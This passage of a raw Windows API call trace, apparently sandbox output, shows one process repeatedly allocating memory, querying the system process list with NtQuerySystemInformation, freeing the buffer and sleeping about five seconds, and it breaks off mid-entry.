[0150.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.508] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.561] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.583] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.593] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.607] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.626] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.636] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.647] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.656] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.675] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.784] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.872] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.905] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.914] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.931] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.943] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.964] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0150.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0150.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0150.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0150.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0150.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0150.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0150.975] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.086] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.241] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.293] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 